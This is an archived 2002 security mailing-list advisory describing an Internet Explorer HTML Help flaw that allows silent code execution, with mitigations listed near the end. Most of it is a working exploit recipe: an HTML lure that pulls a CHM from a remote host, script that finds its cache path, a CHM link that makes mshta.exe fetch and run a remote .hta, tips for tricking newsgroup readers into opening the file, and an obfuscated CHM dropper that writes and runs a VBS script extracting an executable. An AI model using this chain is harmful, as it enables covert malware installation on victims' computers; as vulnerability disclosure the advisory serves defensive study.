[NT] Default HELP System of Internet Explorer Allows Arbitrary Code Execution
From: support@securiteam.comDate: 02/11/02
- Previous message: support@securiteam.com: "[NEWS] Texis CGI Path Disclosure Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 11 Feb 2002 23:00:37 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Default HELP System of Internet Explorer Allows Arbitrary Code Execution
------------------------------------------------------------------------
SUMMARY
Default installations of Internet Explorer 5.5 and 6.0 are vulnerable to
an attack that allows attackers to execute files on a target computer,
using technically trivial silent delivery and installation of an
executable.
DETAILS
In the newer versions of Internet Explorer, nothing can be activated
through the Temporary Internet Files unless full path names are known for
both showHelp calling and Click() of our link. Nevertheless, we are able
to retrieve from the Temporary Internet File our Trojaned HTML, determine
the location of it, write this location out to our showHelp call, and
thereafter execute our remote link.
How to recreate:
Create a very simple *.html file like so:
<bgsound src="http://www.example.com/malware.chm">
This will pull our *.chm into the Temporary Internet File
Then include the Guninski scripting to determine the location of our
*.html file like so:
malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);
Then take that location information and write it to a simple HTML form
like so:
document.write('<FORM name="malware"
ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
document.write('<form><input type="hidden" size="40" maxlength="80"
value="'+path+'\\malware[1].chm"></form>');
Technical note: it seems the myriad of patching to date does not make it
possible to pass the location directly to the showHelp call. It must be
written to the form which can then be automatically submitted:
setTimeout('document.malware.submit()',5000);
Before we do all that we create our very simple malware.chm and include
our link object like so:
C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta
This is particularly interesting as we are able to pass a link to the
mshta.exe, which in turn will open from the remote site our *.hta that
includes our executable. All of this without a single warning.
Technical note: the possibility is excellent to repeat the entire process
above directly inside the *.chm file and drop an *.exe from within the
*.chm into the same Temporary Internet File. Using our Guninski scripting
to determine the location of the *.chm and write that to the link
parameter within it: value="'+path+'\\malware[1].exe"> and execute it.
So what happens?
We construct our trojaned HTML file and send them off to our target
computer. This can be via mail or news. The recipient receives the mail
message and attached *.html file. We then convince our unsuspecting
recipient to open our *.html. This should be quite trivial, particularly
in news, as the attached file is in fact nothing more than a 500-byte HTML
file.
Consider the following scenario in your favorite web design news group:
(Note: there is a hardened security warning when attempting to open
attached *.html file. However, our combination call for assistance coupled
with nothing more than a legitimate *.html file should prove more than
tempting):
Screen shot: <http://www.malware.com/duh.png>
http://www.malware.com/duh.png 18KB)
Why does it happen?
Because our simple *.html file is an attachment, security has it transfer
to the Internet Temporary File for opening, under the security browser's
settings. However, precisely because it is physically opened within the
TIF, we can use our Guninski scripting to determine the exact location,
write that exact location to our form and call our *.chm where it too
resides.
Working Example: (includes harmless *.exe - the *.chm is hard coded for
win98)
<http://www.malware.com/help!.zip> http://www.malware.com/help!.zip
Solution:
1. Beware of "innocent" *.html files in mail and news
2. Disable Active Scripting and Active X controls
3. <http://www.kb.cert.org/vuls/id/25249> Disable the HHCtrl ActiveX
control
4. Disable or Remove Mshta.exe (although if an .exe file is embedded
directly into the *.chm then this has no impact)
Proof of concept on a CHM EXE dropper:
To prevent accidental exploitation, a few characters have been replaced in
the code below:
Flow of events:
1) CHM opens
a) Determines absolute path current folder
b) Determines parent chm name (in case cached changes name)
c) Detects WinNT or Win98 to work on both
2) CHM name is used to auto generate a VBS script data absolute paths are
used to auto generate HTML object, data script writes dynamically
generated content to window.
3) First object activated programmatically, VBS script is echoed into
existence into same folder as parent CHM file.
4) Waits 1sec then activates echoed.vbs file, this VBS file reads the
parent .CHM and extracts a hello world exe that is then appended onto the
CHM file.
5) After EXE has been written to disk VBS script activates it.
Code:
funct!on getChmAbsPath(){
t=unescape(location.href)
return t.substring(t.indexOf(":",4)+1,t.lastIndexOf("\\")+1)
}
funct!on getChmName(){
l=unescape(location.href)
chmName=l.substring(l.lastIndexOf("\\")+1,l.lastIndexOf(":")-1)
t='Chr(92)+'
for(i=0;i<chmName.length;i++){
t+= 'Chr(' + chmName.charCodeAt(i) + ')+'
}
return t.substring(0,t.length-1);
}
funct!on getInterpreter(){
if(navigator.userAgent.indexOf('NT') > 0){
return 'cmd';
}else{
return 'command';
}
}
vbs='fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+
Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+
Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):'+
'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+
Chr(104)+Chr(101)+Chr(108)+Chr(108):'+
'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+
Chr(101)+Chr(120)+Chr(101):'+
'set i=createobject(fso):'+
'set o=createobject(fso):'+
'set w=createobject(wsc):'+
'pf=i.GetParentFolderName(WSCript.ScriptFullName):'+
'infile=pf+' + getChmName() + ':'+
'outfile=pf+exename:'+
'OFFSET=XXXXXXX:'+
'Set ii=i.OpenTextFile(infile):'+
'Set oo=o.OpenTextFile(outfile,2,True):'+
'ii.Read OFFSET:'+
'While Not ii.AtEndOfStream:'+
'oo.Write Chr(Asc(ii.Read(1))):'+
'Wend:ii.close:oo.close:'+
'w.Run chr(34)+outfile+chr(34)'
hit='<OBJECT id=shortcut^ type="application/x-oleobject" '+
'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" '+
'codebase="hhctrl.ocx\#Version=4,72,8252,0" width=100 '+
'height=100><PARAM name="Command" value="ShortCut"> '+
'<PARAM name="Text" value="Text: "> '+
'<PARAM name="Item1" value=\',*\'> '+
'<PARAM name="Item2" value="273,1,1"></OBJECT> '
scriptPath = getChmAbsPath() + 'echoed.vbs'
cmd=new Array
cmd[1]= getInterpreter() + ',/c echo ' + vbs + ' > "' + scriptPath + '"'
cmd[2]='wscript,"' + scriptPath + '"'
funct!on replace(h,i,c){
h = h.split('^').join(i).split('*').join(c)
return h
}
hit1=replace(hit,1,cmd[1])
hit2=replace(hit,2,cmd[2])
document.write(hit1+hit2+msg)
shortcut1.Click()
setTimeout("shortcut2.Click()",1000)
ADDITIONAL INFORMATION
The information has been provided by Malware and <mailto:dzzie@yahoo.com>
dzzie.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Texis CGI Path Disclosure Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
